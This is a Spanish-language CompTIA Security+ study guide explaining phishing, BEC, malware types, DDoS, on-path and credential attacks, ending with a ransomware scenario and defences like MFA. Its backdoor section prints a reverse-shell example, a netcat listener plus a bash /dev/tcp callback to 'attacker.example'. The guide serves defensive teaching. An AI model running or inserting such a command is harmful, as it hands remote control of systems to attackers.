CompTIA SY0-701: Amenazas, Ataques y Vulnerabilidades — Guía de estudio
Forma parte de la CompTIA Security+ SY0-701 — Guía de estudio. Practica con respuestas verificadas en el centro de exámenes de CompTIA, o realiza tests cronometrados en ExamRoll.io.
El panorama de amenazas moderno se define por adversarios que combinan la explotación técnica con la manipulación humana, encadenan debilidades de baja severidad para convertirlas en brechas de alto impacto y disfrazan su actividad dentro de procesos de negocio legítimos. Entender las amenazas comienza por comprender la intención, la capacidad y el vector, y por negarse a aceptar el síntoma superficial como la explicación completa.
Ingeniería social y variantes de phishing
La ingeniería social explota la confianza, la urgencia, la autoridad o la curiosidad en lugar de las fallas de software. El phishing tradicional lanza una red amplia a través del correo electrónico, enviando señuelos genéricos como notificaciones de envío falsas o solicitudes de restablecimiento de contraseña a miles de destinatarios. El spear phishing reduce el enfoque, utilizando reconocimiento de LinkedIn, sitios web corporativos o volcados de datos de brechas para elaborar mensajes personalizados para un individuo o departamento específico. El whaling se dirige a los ejecutivos (el director financiero que recibe un mensaje diseñado para que parezca que proviene de un asesor externo es el objetivo clásico) porque su autoridad permite fraudes de mayor impacto.
Las variantes de canal extienden la misma manipulación a otros medios. El vishing (voice phishing o phishing por voz) utiliza llamadas telefónicas, a menudo con un identificador de llamadas falsificado y un pretexto como hacerse pasar por el servicio de asistencia de TI para extraer códigos MFA. El smishing utiliza SMS, aprovechando con frecuencia URL acortadas y señuelos específicos para móviles (“No se pudo entregar su paquete; reprograme aquí”). Debido a que los navegadores móviles truncan las URL y ocultan los detalles de los certificados, el smishing tiene una tasa de éxito desproporcionadamente alta.
El Business Email Compromise (BEC) merece una atención especial porque, por lo general, no implica ningún tipo de malware. Un atacante que ha comprometido un buzón de correo legítimo o ha suplantado un dominio similar (accounts@vend0r-corp.com en lugar de accounts@vendor-corp.com) se inserta en un hilo de facturación real y redirige una transferencia bancaria. Dado que el contenido del correo electrónico es contextualmente preciso y no hay archivos adjuntos, el antimalware de la puerta de enlace (gateway) y el sandboxing de URL ofrecen poca protección. El IC3 del FBI reportó pérdidas por BEC que superaron los 2900 millones de dólares en un solo año, lo que lo convierte en la categoría de ciberdelito de mayor valor monetario por un amplio margen.
Una trampa común es sobreinterpretar síntomas que parecen benignos. Cuando un usuario envía sus credenciales a un sitio de phishing y recibe un error de “página no encontrada”, el incidente no está resuelto: es una recolección de credenciales completada en la que el atacante ha redirigido a la víctima después de la captura. La ausencia de una página de error obvia es una característica del ataque, no una prueba de su fracaso.
Tipos de malware
El malware no es un monolito. El ransomware cifra los datos y exige un pago, y las variantes modernas como Ryuk, Conti y LockBit también exfiltran los datos primero para tener una doble palanca de extorsión. Un indicador revelador es un cambio masivo en la extensión de los archivos (archivos renombrados a .ryk, .locked o una cadena aleatoria), junto con notas de rescate llamadas README.txt o HOW_TO_DECRYPT.html en cada directorio.
Los rootkits operan a un nivel mucho más profundo, interceptando (hooking) estructuras del kernel, tablas de llamadas al sistema o firmware (bootkits, implantes UEFI) para ocultar procesos, archivos y conexiones de red del propio sistema operativo. Debido a que las herramientas estándar consultan al kernel que el rootkit controla, no se puede confiar en la salida de tasklist o ps; la detección generalmente requiere un análisis forense de imágenes sin conexión (offline) o una comparación con una línea base conocida como buena a través de herramientas como chkrootkit o análisis de memoria con Volatility.
Los backdoors (puertas traseras) proporcionan acceso persistente no autorizado, a menudo instalados después de la brecha inicial. Pueden tomar la forma de una tarea programada que se comunica (beacons out) con un servidor de comando y control, una credencial codificada insertada en una aplicación o un servicio a la escucha en un puerto poco común. Las reverse shells que utilizan herramientas como Netcat o Meterpreter son típicas:
# Attacker listener
nc -lvnp 4444
# Victim callback (dropped by malware)
bash -i >& /dev/tcp/attacker.example/4444 0>&1
La trampa aquí es la visión de túnel en el triaje. Una alerta etiquetada como “malware detectado” que se pone en cuarentena rápidamente no significa que el incidente haya terminado; el dropper inicial puede haber establecido ya un backdoor o instalado un rootkit que el agente del endpoint no puede ver.
Ataques de red
Los ataques de denegación de servicio distribuido (DDoS) apuntan a la disponibilidad. Los ataques volumétricos (inundaciones UDP, inundaciones ICMP) consumen ancho de banda bruto. Los ataques reflejados/amplificados abusan de servicios de terceros que responden con cargas útiles (payloads) más grandes que la solicitud; una consulta DNS de 60 bytes con una dirección de origen falsificada (spoofed) puede devolver una respuesta de 3000 bytes, y la amplificación mediante monlist de NTP o memcached puede alcanzar ratios superiores a 50 000×. Cuando los servicios web públicos permanecen “activos” en el servidor pero son inalcanzables desde Internet, y los registros de red muestran un pico de tráfico, la respuesta es casi siempre un DDoS que satura los enlaces ascendentes o las tablas de estado, no un error de la aplicación.
Los ataques on-path (anteriormente “man-in-the-middle” o de intermediario) colocan al atacante entre dos partes que se comunican. En una red local, el envenenamiento de ARP (ARP poisoning) es el mecanismo habitual: el atacante envía respuestas ARP no solicitadas afirmando poseer la IP de la puerta de enlace (gateway), de modo que el tráfico de la víctima se enruta silenciosamente a través del host del atacante. Herramientas como ettercap o arpspoof automatizan esto, después de lo cual el atacante puede eliminar TLS con sslstrip o inyectar contenido.
El typosquatting consiste en registrar dominios que imitan a los legítimos (goggle.com, paypa1.com) para capturar URL mal escritas o para servir como infraestructura convincente para el phishing y el BEC.
Ataques de credenciales
En lugar de explotar código, los ataques de credenciales explotan una autenticación débil. La fuerza bruta intenta todas las contraseñas posibles contra una sola cuenta, es un método ruidoso y activa las políticas de bloqueo de cuentas. La pulverización de contraseñas (password spraying) invierte el modelo: se prueban una o dos contraseñas muy comunes (Winter2024!, Password123) contra miles de cuentas, manteniéndose por debajo del umbral de bloqueo en cualquier cuenta individual. Esto es excepcionalmente efectivo contra organizaciones que no utilizan MFA en sus proveedores de identidad en la nube.
El relleno de credenciales (credential stuffing) reutiliza pares de nombre de usuario/contraseña obtenidos de brechas de seguridad anteriores, explotando la reutilización de contraseñas entre diferentes servicios. Debido a que las credenciales son válidas en al menos un servicio, evitan los controles de autenticación básicos. La brecha de seguridad de Okta en 2022 comenzó con un ataque de credential stuffing contra la cuenta de un contratista de soporte, lo que demuestra que incluso los proveedores de identidad no son inmunes cuando no se exige el uso de MFA en todas las rutas de acceso privilegiado.
Los ataques de Pass-the-hash y pass-the-ticket roban material de autenticación de la memoria en lugar de descifrar contraseñas. En sistemas Windows, los hashes NTLM almacenados en la memoria de LSASS pueden ser extraídos con Mimikatz y reutilizados para autenticarse en otros sistemas sin conocer la contraseña en texto plano. De manera similar, los ticket-granting tickets (TGTs) de Kerberos pueden ser robados y reutilizados. Las mitigaciones incluyen Credential Guard (que aísla LSASS en un enclave de seguridad basado en virtualización), la pertenencia al grupo de seguridad Protected Users y la desactivación de NTLM donde Kerberos esté disponible.
Escenario práctico: Ransomware a través de pulverización de contraseñas
Una empresa de logística con 2400 empleados no había impuesto el uso de MFA en su tenant de Microsoft 365. Un atacante llevó a cabo un ataque de password spraying durante tres días, probando la contraseña Summer2023! contra todas las direcciones de correo electrónico conocidas recopiladas de LinkedIn. Cuarenta y una cuentas coincidieron. El atacante utilizó una cuenta comprometida —la de un gerente regional— para acceder a la VPN de la empresa, que aceptaba credenciales de M365. Desde la VPN, el atacante pasó dos semanas realizando reconocimiento interno, identificando servidores de respaldo y controladores de dominio. Un viernes por la noche, se detonó el ransomware LockBit en 340 servidores. La recuperación tardó 19 días y costó aproximadamente 4,1 millones de dólares, incluyendo el rescate, el análisis forense y la pérdida de ingresos. Toda la cadena de ataque fue posible por la falta de un único control: MFA en el tenant de M365. La pulverización de contraseñas es detectable: una regla en el SIEM que correlacionara las autenticaciones fallidas en muchas cuentas desde una única IP lo habría detectado el primer día.
← Gestión de Identidad y Acceso · Todos los dominios · Seguridad y Arquitectura de Red →
Practica estas preguntas → · Práctica cronometrada en ExamRoll.io →
Pass the whole exam — not just this question
You found this answer. Get every verified question and explanation in one place, and save hours of prep. Free to start.
Aprueba tu examen →